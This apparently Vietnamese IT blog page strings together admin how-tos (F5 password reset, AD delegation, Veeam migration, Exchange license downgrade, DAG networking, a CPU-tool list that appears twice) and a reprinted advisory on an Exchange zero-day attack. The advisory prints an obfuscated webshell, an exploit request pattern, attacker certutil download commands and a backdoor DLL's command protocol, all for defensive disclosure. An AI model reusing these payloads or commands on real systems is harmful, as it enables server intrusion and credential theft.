Cách Reset Password Root Và Admin F5 BIG-IP Configuration Utility Bằng TMSH

Mô tả

Để cập nhật admin BIG-IP Configuration qua web thì chúng ta còn nhớ mật khẩu mới vào được. Tuy nhiên vì lý do gì đó quên luôn mật khẩu admin trên web. Chúng ta phải dùng đến công cụ TMOS Shell (tsmh) của F5 nhé.

Thực hiện

Bước 1: logon vào Shell hoặc SSH gỏ lệnh tmsh

tmsh

Bước 2: gỏ lệnh bên dưới

modify auth password root

Nhập password mới và nhập lại cho root account

Bước 3 : để reset luôn tài khoản web admin dùng để cấu hình gỏ lệnh bên dưới

modify auth user admin prompt-for-password

Bước 4 : lưu cấu hình bằng lệnh save sys config

save sys config

Bước 5: Quit

Kiểm tra lại logon nhé

Như vậy là thành công rồi nhé. Chúc các bạn reset thành công trong công việc quản trị F5 network.

Phương Nguyễn Viết

Vui lòng ghi rõ nguồn từ trang nếu có repost

Nguồn: https://viettechgroup.vn/cach-reset-password-root-va-admin-f5-big-ip-configuration-utility-bang-tmsh.html

TOP 10 phần mềm kiểm tra, đo nhiệt độ CPU máy tính chính xác nhất 2022

Đối với 1 quản trị viên, IT system hoặc Helpdesk thì các phần mềm hiển kiểm tra và đo nhiệt độ CPU trong bài viết này sẽ là trợ thủ đắc lực để bạn kiểm tra hiệu suất máy tính để tiện cho việc sửa chữa, khắc phục hoặc nâng cấp nếu cảm thấy cần thiết. Các công cụ này cũng là giúp các anh em báo cáo cũng như đưa ra con số định lượng, bằng chứng xác thực giúp đánh giá máy tính, tình trạng disk để có cơ sở nâng cấp.

Top 10 phần mềm kiểm tra và đo nhiệt độ CPU máy tính chính xác nhất hiện nay

1. Phần mềm AIDA64 Extreme

Tải về AIDA64 Extreme

AIDA64 Extreme thực sự là một phần mềm kiểm tra và đo nhiệt độ CPU nổi danh với khả năng thông báo hết sức chi tiết tình trạng phần cứng, từ đó thay người dùng đánh giá mức độ hiệu quả trong quá trình thiết bị vận hành. Các chức năng nổi trội của AIDA64 Extreme bao gồm đánh giá lỗi phần cứng, kiểm soát hoạt động CPU và khả năng đo nhiệt độ CPU.

2. Phần mềm SpeedFan

Tải về SpeedFan

Phần mềm đo nhiệt độ CPU Speedfan từ lâu đã được biết đến là một trong những công cụ hỗ trợ đo nhiệt độ CPU tốt nhất trên thị trường. Ngoài khả năng theo dõi hiệu quả tốc độ quạt, điện áp và mức nhiệt hiện tại của máy tính, CPU Speedfan con cho phép hiệu chỉnh tốc độ quạt theo ý muốn. Điều này giúp chủ nhân thiết bị chủ động được nếu cảm thấy quạt CPU chạy quá nhanh, quá chậm hay quá ồn.

3. Phần mềm CPU-Z

Tải về CPU-Z

CPU-Z được không ít người lựa chọn khi kiếm tìm một phần mềm hiển thị tốc độ CPU nhẹ và hiệu quả. CPU-Z nổi danh nhờ khả năng thống kê tên CPU, tên mã, chipset, chỉ số TDP tối đa, loại chân cắm CPU. Thông qua CPU-Z, bạn sẽ kiểm tra được nhiều thông tin về phần cứng thiết bị, dữ liệu CPU máy tính và bộ nhớ cache, đồng thời đo nhiệt độ CPU hiệu quả.

4. CPUID HWMonitor

Tải về CPUID HWMonitor

Nếu bạn cần một công cụ giám sát phần cứng hiệu quả thì CPUID HWMonitor sẽ là sự lựa chọn hết sức hợp lý bởi phần mềm này có thể theo dõi những chỉ số ảnh hưởng trực tiếp đến sức mạnh của hệ thống. CPUID HWMonitor có giao diện rất dễ dùng, nổi bật ở khả năng nhận biết nhiệt độ ổ cứng qua card video GPU và S.M.A.R.T.

5. Speccy

Tải về Speccy

Ngoài việc phản ảnh nhiệt độ CPU, phần mềm Speccy còn tỏ ra nổi trội ở việc hiển thị đầy đủ thông tin về CPU, RAM, Motherboard, Graphics, ổ cứng, ổ CD và Audio. Sự toàn diện và tính giản đơn của Speccy đem tới một phương án hữu hiệu nhất dành cho những ai muốn nắm được thông tin nhiệt độ cùng với hiệu suất phần cứng trên chiếc PC, laptop mình đang dùng.

6. HWiNFO64

Tải về HWiNFO64

Với HWiNFO64, người dùng có thể theo dõi nhiều thông tin chi tiết về tình trạng hoạt động cũng như những thông tin phần cứng như CPU hay RAM máy tính. Mọi chỉ số cần thiết như tốc độ quạt, nhiệt độ, nguồn và điện thế được hiển thị đầy đủ trong giao diện cũng góp phần biến HWiNFO64 thành công cụ giám sát hệ thống đắc lực.

6. HWiNFO64

Tải về HWiNFO64

Với HWiNFO64, người dùng có thể theo dõi nhiều thông tin chi tiết về tình trạng hoạt động cũng như những thông tin phần cứng như CPU hay RAM máy tính. Mọi chỉ số cần thiết như tốc độ quạt, nhiệt độ, nguồn và điện thế được hiển thị đầy đủ trong giao diện cũng góp phần biến HWiNFO64 thành công cụ giám sát hệ thống đắc lực.

8. Real Temp

Tải về Real Temp

Nổi bật ở tác vụ phân tích nhiệt độ các loại chip máy tính, Real Temp là công cụ hỗ trợ quản lý quá trình làm việc hết sức đắc lực, giúp bạn thấy được đâu mới là tốc độ lý tưởng nhất cho chiếc PC/laptop mà mình sở hữu. Bạn cũng có thể thông qua Real Temp để biết được nhiệt độ tối thiểu và tối đa của cả hệ thống.

9. MSI Afterburner

Tải về MSI Afterburner

Nhờ giao diện thiết kế đẹp mắt mang phong cách gaming và khả năng hỗ trợ ép xung laptop chuyên nghiệp, MSI After burner trở thành phần mềm hiển thị nhiệt độ CPU trên laptop được nhiều game thủ lựa chọn. Nhìn trong hình dưới, chắc hẳn bạn cũng thấy rõ chỉ số tốc độ CPU được đặt ở vị trí rất dễ quan sát. Ngoài ra, bạn còn có thể thông qua MSI After burner để hiệu chỉnh tốc độ quạt và gia tăng hiệu suất bộ nhớ.

10. NZXT’s Cam software

Đây là một phần mềm có giao diện khá đẹp, thân thiện và dễ dùng, bao gồm nhiều mục giám sát như CPU, GPU, HDD, Network….Ngoài ra,bạn có thể mua 1 số linh kiện của hãng NZXT để dùng trong cùng 1 ứng dụng như mod đèn, chỉnh các chế độ đèn case…

Cách kiểm tra nhiệt độ CPU máy tính không cần phần mềm

Để thực hiện cách kiểm tra nhiệt độ CPU không cần phần mềm này, bạn cần mở BIOS bằng cách khởi động lại máy tính, sau đó nhấn các phím chức năng (Fn) ngay khi logo thương hiệu hiện ra.

Lúc này, bạn truy cập vào mục PowerTại dòng CPU Temperature, hệ thống sẽ cho bạn thấy được mức nhiệt của CPU hiện tại là bao nhiêu.

Cách ủy quyền quyền để cho phép người dùng tham gia máy tính vào miền AD-Join Domain

Ngữ cảnh

Câu chuyện quản trị system của Doanh nghiệp thường quy mô cở trung, vừa to,… Nếu doanh nghiệp chúng ta nhỏ thường ông quản trị mạng làm hết nghĩa là roles và vai trò system admin, network admin là 1 nói chung là all in one 🙂 đó là câu chuyện đương nhiên để tiết giảm chi phí cho Doanh nghiệp. Tuy nhiên đối với Doanh nghiệp lớn SMB to hệ thống vài 1000 user đến vài trăm ngàn user, thì IT helpdesk cần có và phân công nhiệm vụ rõ ràng. Ông System Admin quản trị Domain controller rồi có thể cho các bạn Helpdesk hoặc đơn vị nào đó ví dụ Outsoucing để có quyền tham gia hay join máy tính vào domain. Câu chuyện đặt ra chúng ta không thể một mình làm hết được nên chúng ta phải cho phép ủy quyền 1 số nhóm hoặc người dùng helpdesk làm công chuyện này. Dĩ nhiên loại trừ 1 số người dùng có số lần join domain là 10 lần.

Giải pháp

Hôm nay phương nguyễn chia sẽ đến các bạn một mẹo nhỏ trong quản trị hệ thống mạng Domain controller nhé để làm công đoạn này có 2 cách có thể làm:

  • Ủy quyền 1 nhóm người hoặc người nào đó có quyền sử dụng Active Directory Users and Computers mà cụ thể là join domain.
  • Tạo 1 chính sách GPO trên default domain group policy để cấp quyền

Các thực hiện ủy quyền trên ADUC

Để thực hiện delegation vào start-> gỏ lệnh dsa.ms run Active Directory Users & Computers

Tạo 1 nhóm để ủy quyền nhé ví dụ GroupITHelpdesk

Thêm các user cần ủy quyền join vào nhé ví dụ : jsisen, phuong

Muốn ủy quyền OU nào thì chọn OU đấy nhé hoặc có thể chọn cả domain 🙂 phải chuột chọn delegation

Chọn Nex->

Chọn -> Add group vừa tạo trên và chọn ok->next.

Chọn Delegation the following Common tasks-> Join a Computer to the domain

Hoặc chọn Create a custom task to delegate thì chọn Create computer object và Delete nhé.

Chọn Ok finish nhé.

Như vậy Phương Nguyễn chia sẽ cách ủy quyền 1 tài khoản hoặc nhóm có thể có quyền join domain. Chúng ta có thể bàn giao cho các anh em IT helpdesk đi làm mỗi 1 nhiệm vụ join thôi nhé.

Hehehe Nếu thấy hay hãy nhớ like và sharing cho các anh em IT và nếu có copy bài nhớ ghi source từ bài viết.

Phương Nguyễn Viết

CÁCH CHUYỂN MÁY ẢO VM TỪ VMWARE VSPHERE ESXI SANG HYPER-V BẰNG VEEAM BACKUP & REPLICATION -PHẦN 1

Ngữ cảnh

Trong quản trị hệ thống các anh em hay có như cầu chuyển đổi hệ thống ảo hóa qua lại với nhau từ các môi trường ảo hóa VMware Esxi sang hyper-v hoặc Hyper-V qua VMware Esxi, việc chuyển đổi này tương đương việc đổi các định dạng disk hệ thống cho phù hợp, Ví dụ Vmware (VMDK)=> Hyper-V (VHDX) hoặc ngược lại. Hôm nay Phương Nguyễn giới thiệu 1 tính năng rất hay của Veeam backup & Replication dùng để convert từ máy ảo VM từ môi trường VMware Vsphere Esxi sang Hyper-V nhé.

Thông tin

  • VM đang chạy ESXI6.7 đang chạy dịch vụ Microsoft Exchange 2016
  • Host Đang chạy Hyper-V cần move máy ảo Exchange qua.
  • Server Veeam backup & Replication v11 đã setup
  • Nhu cầu cần chuyển VM đang chạy Dịch vụ Microsoft Exchange 2016

Thực hiện

Tiến hành dùng Veeam and Replication để backup VM trên ESXI 6.7

Sau backup xong tiến hành restore chọn Hyper-V

Từ Home->backup->VM vừa backup xong chúng ta tận dụng tính năng Instant Recovery-> Microsoft Hyper-V. Ở đây có 2 tùy chọn VMware vsphere, nghĩa môi trường ngược lại thì chúng ta backup hyper-v restore sang Vmware, lab tôi đang cần move qua Hyper-V.

Chọn restore point cũng được, mặc định sẽ chọn backup cuối cùng

Chọn Host-> chọn Server Hyper-V cần migration qua

Chúng ta chọn nơi lưu cấu hình và disk cho VM cần move qua

Network để sau khi restore config sau

Giữ lưu UUID cũ,

Xem có scan virus không không cần bỏ qua

Retoring Instance nghĩa là sẽ mount trực tiếp từ respoisty lên làm datastores để chạy trực tiếp từ Hyper-V móc vào các Veeam backup nhé, mục tiêu giúp chạy nhanh giải quyết bussiness có thể giảm thiểu downtime hệ thống. Trạng thái các bạn đang thấy là status đã mounted.

Về mặt production sau khi đảm bảo giải quyết câu chuyện backup thì chúng ta sẽ chọn vào restore để migration to production chuyển đổi hoàn toàn luôn, nghĩa là sẽ copy và restoring sang host hyper-v nhé.

Khi migration to production chuyển trạng thái mounted-> restoring nhé.

Restore thành công nhé.

Như vậy là thành công chuyển đổi máy ảo Exchange 2016 từ môi trường VMware esxi vsphere sang môi trường Microsoft Hyper-V. Ngoài công cụ Veeam backup & replication có thể có nhiều công cụ giúp chúng ta chuyển đổi V2V, P2V… các bạn đoán xem phần 2 tại đây nhé.

Chúc các bạn thành công

Phương Nguyễn Viết

Vui lòng ghi rõ nguồn gốc nếu có copy

Nguồn https://viettechgroup.vn/cach-chuyen-may-ao-vm-tu-vmware-vsphere-esxi-sang-hyper-v-bang-veeam-backup-replication-phan-1.html

TOP 10 phần mềm kiểm tra, đo nhiệt độ CPU máy tính chính xác nhất 2022

Đối với 1 quản trị viên, IT system hoặc Helpdesk thì các phần mềm hiển kiểm tra và đo nhiệt độ CPU trong bài viết này sẽ là trợ thủ đắc lực để bạn kiểm tra hiệu suất máy tính để tiện cho việc sửa chữa, khắc phục hoặc nâng cấp nếu cảm thấy cần thiết. Các công cụ này cũng là giúp các anh em báo cáo cũng như đưa ra con số định lượng, bằng chứng xác thực giúp đánh giá máy tính, tình trạng disk để có cơ sở nâng cấp.

Top 10 phần mềm kiểm tra và đo nhiệt độ CPU máy tính chính xác nhất hiện nay

1. Phần mềm AIDA64 Extreme

Tải về AIDA64 Extreme

AIDA64 Extreme thực sự là một phần mềm kiểm tra và đo nhiệt độ CPU nổi danh với khả năng thông báo hết sức chi tiết tình trạng phần cứng, từ đó thay người dùng đánh giá mức độ hiệu quả trong quá trình thiết bị vận hành. Các chức năng nổi trội của AIDA64 Extreme bao gồm đánh giá lỗi phần cứng, kiểm soát hoạt động CPU và khả năng đo nhiệt độ CPU.

2. Phần mềm SpeedFan

Tải về SpeedFan

Phần mềm đo nhiệt độ CPU Speedfan từ lâu đã được biết đến là một trong những công cụ hỗ trợ đo nhiệt độ CPU tốt nhất trên thị trường. Ngoài khả năng theo dõi hiệu quả tốc độ quạt, điện áp và mức nhiệt hiện tại của máy tính, CPU Speedfan con cho phép hiệu chỉnh tốc độ quạt theo ý muốn. Điều này giúp chủ nhân thiết bị chủ động được nếu cảm thấy quạt CPU chạy quá nhanh, quá chậm hay quá ồn.

3. Phần mềm CPU-Z

Tải về CPU-Z

CPU-Z được không ít người lựa chọn khi kiếm tìm một phần mềm hiển thị tốc độ CPU nhẹ và hiệu quả. CPU-Z nổi danh nhờ khả năng thống kê tên CPU, tên mã, chipset, chỉ số TDP tối đa, loại chân cắm CPU. Thông qua CPU-Z, bạn sẽ kiểm tra được nhiều thông tin về phần cứng thiết bị, dữ liệu CPU máy tính và bộ nhớ cache, đồng thời đo nhiệt độ CPU hiệu quả.

4. CPUID HWMonitor

Tải về CPUID HWMonitor

Nếu bạn cần một công cụ giám sát phần cứng hiệu quả thì CPUID HWMonitor sẽ là sự lựa chọn hết sức hợp lý bởi phần mềm này có thể theo dõi những chỉ số ảnh hưởng trực tiếp đến sức mạnh của hệ thống. CPUID HWMonitor có giao diện rất dễ dùng, nổi bật ở khả năng nhận biết nhiệt độ ổ cứng qua card video GPU và S.M.A.R.T.

5. Speccy

Tải về Speccy

Ngoài việc phản ảnh nhiệt độ CPU, phần mềm Speccy còn tỏ ra nổi trội ở việc hiển thị đầy đủ thông tin về CPU, RAM, Motherboard, Graphics, ổ cứng, ổ CD và Audio. Sự toàn diện và tính giản đơn của Speccy đem tới một phương án hữu hiệu nhất dành cho những ai muốn nắm được thông tin nhiệt độ cùng với hiệu suất phần cứng trên chiếc PC, laptop mình đang dùng.

6. HWiNFO64

Tải về HWiNFO64

Với HWiNFO64, người dùng có thể theo dõi nhiều thông tin chi tiết về tình trạng hoạt động cũng như những thông tin phần cứng như CPU hay RAM máy tính. Mọi chỉ số cần thiết như tốc độ quạt, nhiệt độ, nguồn và điện thế được hiển thị đầy đủ trong giao diện cũng góp phần biến HWiNFO64 thành công cụ giám sát hệ thống đắc lực.

6. HWiNFO64

Tải về HWiNFO64

Với HWiNFO64, người dùng có thể theo dõi nhiều thông tin chi tiết về tình trạng hoạt động cũng như những thông tin phần cứng như CPU hay RAM máy tính. Mọi chỉ số cần thiết như tốc độ quạt, nhiệt độ, nguồn và điện thế được hiển thị đầy đủ trong giao diện cũng góp phần biến HWiNFO64 thành công cụ giám sát hệ thống đắc lực.

8. Real Temp

Tải về Real Temp

Nổi bật ở tác vụ phân tích nhiệt độ các loại chip máy tính, Real Temp là công cụ hỗ trợ quản lý quá trình làm việc hết sức đắc lực, giúp bạn thấy được đâu mới là tốc độ lý tưởng nhất cho chiếc PC/laptop mà mình sở hữu. Bạn cũng có thể thông qua Real Temp để biết được nhiệt độ tối thiểu và tối đa của cả hệ thống.

9. MSI Afterburner

Tải về MSI Afterburner

Nhờ giao diện thiết kế đẹp mắt mang phong cách gaming và khả năng hỗ trợ ép xung laptop chuyên nghiệp, MSI After burner trở thành phần mềm hiển thị nhiệt độ CPU trên laptop được nhiều game thủ lựa chọn. Nhìn trong hình dưới, chắc hẳn bạn cũng thấy rõ chỉ số tốc độ CPU được đặt ở vị trí rất dễ quan sát. Ngoài ra, bạn còn có thể thông qua MSI After burner để hiệu chỉnh tốc độ quạt và gia tăng hiệu suất bộ nhớ.

10. NZXT’s Cam software

Đây là một phần mềm có giao diện khá đẹp, thân thiện và dễ dùng, bao gồm nhiều mục giám sát như CPU, GPU, HDD, Network….Ngoài ra,bạn có thể mua 1 số linh kiện của hãng NZXT để dùng trong cùng 1 ứng dụng như mod đèn, chỉnh các chế độ đèn case…

Cách kiểm tra nhiệt độ CPU máy tính không cần phần mềm

Để thực hiện cách kiểm tra nhiệt độ CPU không cần phần mềm này, bạn cần mở BIOS bằng cách khởi động lại máy tính, sau đó nhấn các phím chức năng (Fn) ngay khi logo thương hiệu hiện ra.

Lúc này, bạn truy cập vào mục PowerTại dòng CPU Temperature, hệ thống sẽ cho bạn thấy được mức nhiệt của CPU hiện tại là bao nhiêu.

Network Adapter Configurations For DAG Members best practice

It is important to configure the network adapter settings correctly for a DAG member. Few points that need to be noted:

  • Single NIC for DAG members is supported.
  • All DAG members should have the same number of networks, MAPI and Replication networks.
  • DAG members can have only one MAPI network and zero or more Replication networks.
  • Persistent static routes are used to configure traffic in a replication network.
  • It is recommended to have atleast two DAG networks, MAPI and a replication network.

The MAPI network should be connected to the production network, so that it can talk with other Exchange servers, AD, DNS etc. The MAPI network (NIC) should be configured as given in the table below.

Networking FeaturesSetting
Client for Microsoft NetworksEnabled
QoS Packet SchedulerOptionally enable
File and Printer Sharing for Microsoft NetworksEnable
Internet Protocol Version 6 (TCP/IP v6)Optionally enable
Internet Protocol Version 4 (TCP/IP v4)Enabled
Link-Layer Topology Discovery Mapper I/O DriverEnabled
Link-Layer Topology Discovery ResponderEnabled

Configure the following as well for the MAPI network.

  • The IP address can be manually assigned or configured to use DHCP. If DHCP is used, use persistent reservations for server’s IP address.
  • The MAPI network typically uses a default gateway, although one isn’t required.
  • At least one DNS server address must be configured. Using multiple DNS servers for redundancy.
  • The “Register this connection’s addresses in DNS” checkbox should be checked.

The Replication network (NIC) should be configured as given in the table below.

Networking FeaturesSetting
Client for Microsoft NetworksDisabled
QoS Packet SchedulerOptionally enable
File and Printer Sharing for Microsoft NetworksDisabled
Internet Protocol Version 6 (TCP/IP v6)Optionally enable
Internet Protocol Version 4 (TCP/IP v4)Enabled
Link-Layer Topology Discovery Mapper I/O DriverEnabled
Link-Layer Topology Discovery ResponderEnabled

Configure the following as well for the MAPI network.

  • The IP address can be manually assigned or configured to use DHCP. If DHCP is used, use persistent reservations for server’s IP address.
  • The Replication network typically doesn’t use a default gateway. If MAPI network has a gateway configured, then, no other networks should have a default gateway.
  • DNS server address should not be configured.
  • The “Register this connection’s addresses in DNS” checkbox should be unchecked.

Finally, the binding order has to be such that MAPI network comes first in the list.

Good Luck

Cách chuyển hạ cấp key bản quyền Exchange Server Enterprise về Standard

Microsoft_Exchange_(2019-present).svg

Có một điều khi chúng ta đã cài Microsoft Exchange Server mà đã kích hoạt bản quyền key là Enterprise. Vì 1 lý do nào đó cần chuyển đối từ Enterprise về standard. Theo Microsoft thì khả năng từ nhỏ lên cao có thể ugprade ok tuy nhiên hạ cấp từ Enterprise về standard thì như thế nào ?

Hôm nay Phương Nguyễn chia sẽ các bạn cách hạ cấp key license Exchange Server đã kích hoạt từ Enterprise về standard, Như chúng ta đã biết các sương sống của Exchange chính là hệ thống domain controller nghĩa là mọi thông tin Exchange đều lưu trên Active Directory, nên chúng ta sẽ căn cứ vào đây để by-pass nhé.

Các bước như sau:

Bước 1: Chúng ta logon vào Domain controller mở run gỏ lệnh adsiedit.msc

Bước 2: Right click->Chọn Connect to => Configuration

Bước 3: Theo đường dẫn sau:

Mở Configuration > Services > Microsoft Exchange > Domain/Org > Administrative Groups > Exchange Administrative Group (FYDIBOHF23SPDLT) > Servers

Thay domain của các bạn nhé: ví dụ đây là PHUONG2.lab

Configuration > Services > Microsoft Exchange >PHUONGIT > Administrative Groups > Exchange Administrative Group (FYDIBOHF23SPDLT) >Servers

Bước 4 Chọn phải chuột vào Server ví dụ đây là Lab-EX2019 => chọn thuộc tính msExchProductID clear trắng nhé, có thể copy lại lưu 1 bản.

Chọn Clear => chọn oke nhé lưu lại

Quay lại Exhange Server để nhập lại key hoặc Powershell

Set-ExchangeServer -Identity LAB-EX2019 -ProductKey xxxxx-xxxxx-xxxxx-xxxxx-xxxxx 

Chúc các bạn thành công

Phương nguyễn viết.

CẢNH BÁO CHIẾN DỊCH TẤN CÔNG SỬ DỤNG LỖ HỔNG ZERO DAY TRÊN MICROSOFT EXCHANGE SERVER

Khoảng từ đầu tháng 08/2022, trong quá trình thực hiện giám sát an ninh mạng và xử lý sự cố, Trung tâm vận hành bảo mật GTSC SOC phát hiện một đơn vị trọng yếu bị tấn công an ninh mạng vào hệ thống ứng dụng Microsoft Exchange. Quá trình điều tra, đội ngũ chuyên gia BlueTeam xác định kẻ tấn công đã sử dụng một lỗ hổng bảo mật của Microsoft Exchange chưa từng được công bố – hay còn gọi là lỗ hổng 0-day. GTSC SOC Team ngay lập tức đưa ra phương án ngăn chặn tạm thời. Song song, các chuyên gia RedTeam cũng bắt tay ngay vào việc nghiên cứu, debug lại mã nguồn ứng dụng Mail Exchange để tìm ra mã khai thác (exploit). Với lỗ hổng bảo mật Exchange trước đây, đội ngũ RedTeam cũng đã từng phân tích ra exploit trước khi có exploit được public trên thế giới (1-day exploit) nên việc hiểu luồng, cơ chế xử lý của hệ thống Email Exchange đã giúp giảm thời gian cho quá trình research. Ngay sau khi nghiên cứu ra exploit, GTSC đã submit lên ZDI để làm việc với Microsoft nhằm nhanh chóng có bản vá.

Sau khi ZDI verify đã ghi nhận 2 bug liên quan đến exploit:

Tuy nhiên đến thời điểm hiện tại, GTSC ghi nhận thêm các đơn vị khác cũng đang gặp phải sự cố. Sau khi kiểm tra, GTSC xác nhận hệ thống bị tấn công qua lỗ hổng 0-day này. Để hỗ trợ cộng đồng ngăn chặn tạm thời trước khi có bản vá chính thức từ Microsoft, chúng tôi công bố bài viết này để cảnh báo tới các đơn vị có sử dụng hệ thống email Microsoft Exchange.

Thông tin lỗ hổng bảo mật 

                – Đội ngũ Blueteam trong quá trình giám sát phát hiện được các request exploit dựa trên log IIS có định dạng giống như lỗ hổng ProxyShell: autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com. Đồng thời kiểm tra các logs khác, nhận thấy kẻ tấn công thực hiện được các câu lệnh trên hệ thống. Kiểm tra version number trên máy chủ Exchange bị tấn công nhận thấy máy chủ đã cài đặt bản cập nhật mới nhất tại thời điểm đó nên không thể có trường hợp khai thác bởi lỗ hổng Proxyshell -> xác nhận máy chủ bị khai thác bởi lỗ hổng 0-day RCE mới. Các thông tin này được Blueteam cung cấp lại cho Redteam, từ đó đội ngũ Redteam của GTSC đã tiến hành nghiên cứu để trả lời cho các câu hỏi như tại sao các request lại giống với request của bug ProxyShell?, luồng RCE được thực hiện như thế nào? 

                – Kết quả nghiên cứu đã giúp GTSC Redteam thành công tìm ra cách sử dụng đường dẫn trên để truy cập tới 1 component ở backend và thực hiện RCE. Thông tin kỹ thuật chi tiết về lỗ hổng tại thời điểm này chúng tôi xin phép chưa công bố.

Các hành vi sau khai thác

Sau quá trình khai thác thành công lỗ hổng, chúng tôi ghi nhận các hành vi tấn công nhằm thu thập thông tin và tạo chỗ đứng trong hệ thống của nạn nhân. Nhóm tấn công cũng sử dụng các kỹ thuật khác nhau nhằm tạo backdoor trên hệ thống bị ảnh hưởng và thực hiện lateral movement sang các máy chủ khác trong hệ thống.

Webshell

Chúng tôi phát hiện các webshell được drop xuống các máy chủ exchange. Các webshell chúng tôi thu thập được hầu hết được obfuscated. Thông qua User-agent chúng tôi phát hiện attacker sử dụng Antsword (một opensource có tính năng hỗ trợ quản lý webshell).

<%@Page Language=”Jscript”%>

<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘NTcyM’+’jk3O3’+’ZhciB’+’zYWZl’+”+’P’+’S’+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘MQ==’))+char(51450/525)+”+”+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘Wg==’))+’m’+”+’UiO2V’+’2YWwo’+’UmVxd’+’WVzdC’+’5JdGV’+’tWydF’+’WjBXS’+’WFtRG’+’Z6bU8’+’xajhk’+’J10sI’+’HNhZm’+’UpOzE’+’3MTY4’+’OTE7’+”)));%>

Chúng tôi nghi ngờ các hành vi khai thác này xuất phát từ các nhóm tấn công Trung Quốc, dựa trên codepage trong webshell là 936, một bảng mã ký tự Microsoft cho tiếng Trung giản thể (simplified Chinese).

Một đặc điểm đáng chú ý khác, bên cạnh việc drop các webshell mới hacker cũng thực hiện thay đổi nội dung trong file RedirSuiteServiceProxy.aspx thành nội dung webshell. RedirSuiteServiceProxy.aspx là một tên file hợp pháp sẵn có trong máy chủ Exchange

FileNamePath
RedirSuiteServiceProxy.aspxC:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
Xml.ashxC:\inetpub\wwwroot\aspnet_client
pxh4HG1v.ashxC:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth

Trong quá trình xử lý sự cố tại một khách hàng khác, GTSC ghi nhận nhóm tấn công có sử dụng một mẫu webshell khác

Filename: errorEE.aspx

SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257

Ref: https://github.com/antonioCoco/SharPyShell

Command Execution

Bên cạnh các hành vi thu thập thông tin trên hệ thống, attacker thực hiện tải file và kiểm tra kết nối thông qua certutil có sẵn trên môi trường Windows

“cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]

“cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]

Ở cuối của mỗi câu lệnh mà kẻ tấn công thực hiện đều có chuỗi echo [S]&cd&echo [E], một trong những dấu hiệu nhận biết của China Chopper.

Ngoài ra, hacker cũng thực hiện inject DLL độc hại vào bộ nhớ, drop các file nghi ngờ lên các máy chủ bị tấn công, và thực thi các file này thông qua WMIC.

Suspicious File

Trên các máy chủ, chúng tôi phát hiện các file nghi ngờ có định dạng exe và dll

FileNamePath
DrSDKCaller.exeC:\root\DrSDKCaller.exe
all.exeC:\Users\Public\all.exe
dump.dllC:\Users\Public\dump.dll
ad.exeC:\Users\Public\ad.exe
gpg-error.exeC:\PerfLogs\gpg-error.exe
cm.exeC:\PerfLogs\cm.exe
msado32.tlbC:\Program Files\Common Files\system\ado\msado32.tlb

Trong số các file nghi ngờ trên, dựa vào các câu lệnh được thực hiện trên máy chủ, chúng tôi nhận định các file all.exe, dump.dll có nhiệm vụ trích xuất thông tin tài khoản trên hệ thống máy chủ. Sau các hành vi trích xuất thông tin tài khoản trên hệ thống, attacker sử dụng rar.exe để nén các file dump và copy ra webroot của máy chủ Exchange. Trong quá trình xử lý sự cố, các file trên đã không còn tồn tại trên hệ thống.

File cm.exe được drop xuống thư mục C:\PerfLogs\ là file cmd.exe

Malware Analysis

Thông tin DLL

File name: Dll.dll

Sha256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82

45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9

9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0

29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3

c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

Phân tích DLL

GTSC phân tích một mẫu cụ thể (074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82) để mô tả hành vi của mã độc, các mẫu DLL khác có nhiệm vụ và hành vi giống nhau, chỉ khác nhau về cấu hình listener

DLL gồm 2 hai class: Run và m. Bên trong mỗi class gọi tới các method thực hiện các nhiệm vụ khác nhau. Cụ thể:

Class Run thực hiện tạo listener lắng nghe các kết nối tới port 443, đường dẫn https://*:443/ews/web/webconfig/.

Sau quá trình lắng nghe, mã độc tạo thread mới goi tới r. Method r thực hiện:

–              Kiểm tra request nhận được có data trong body hay không. Nếu không có data đi kèm trong request gửi lên máy chủ, kết quả trả về là 404.

–              Ngược lại, nếu trong request có đi kèm data, DLL tiếp tục xử lý luồng bên trong nhánh IF:

Kiểm tra request nhận được có tồn tại “RPDbgEsJF9o8S=” hay không. Nếu có, gọi tới method i nằm trong class m để xử lý request nhận được. Kết quả trả về từ Run.m.i sẽ được covert sang chuỗi base64. Kết quả trả về cho client theo format

{

                “result”:1,

                “message”:”base64(aes(result))”

}

Class m

Method thực hiện:

–         Giải mã request nhận được bằng thuật toán AES với 16 bytes đầu tiên của request là giá trị IV, 16 bytes tiếp theo là giá trị key, các giá trị sau đó là data

–         Sau khi giải mã, lấy phần tử đầu tiên trong mảng làm flag để xử lý các case đã được định nghĩa

 Case 0: Gọi tới method info. Method này có nhiệm vụ thu thập thông tin hệ thống. Các thông tin bao như kiến trúc hệ điều hành, phiên bản framework, phiên bản hệ điều hành, v.v….GTSC mô phỏng lại case 0 bằng hình ảnh bên dưới. Request gửi lên theo format 16 bytes đầu là giá trị IV, 16 bytes tiếp theo là giá trị key, theo sau là flag để chỉ định option và phần còn lại là data.

base64 (IV | key | aes(flag|data))

Case 1: Gọi tới method sc. Method này có nhiệm vụ cấp phát vùng nhớ để thực thi shellcode

 Case 2: Gọi tới 2 method p và r. Method p xử lý các dữ liệu được ngăn cách bởi ký tự “|” lưu vào mảng array3. Mảng array3 sẽ lấy 2 phần tử đầu tiên làm tham số cho method r, method r có nhiệm vụ thực thi command

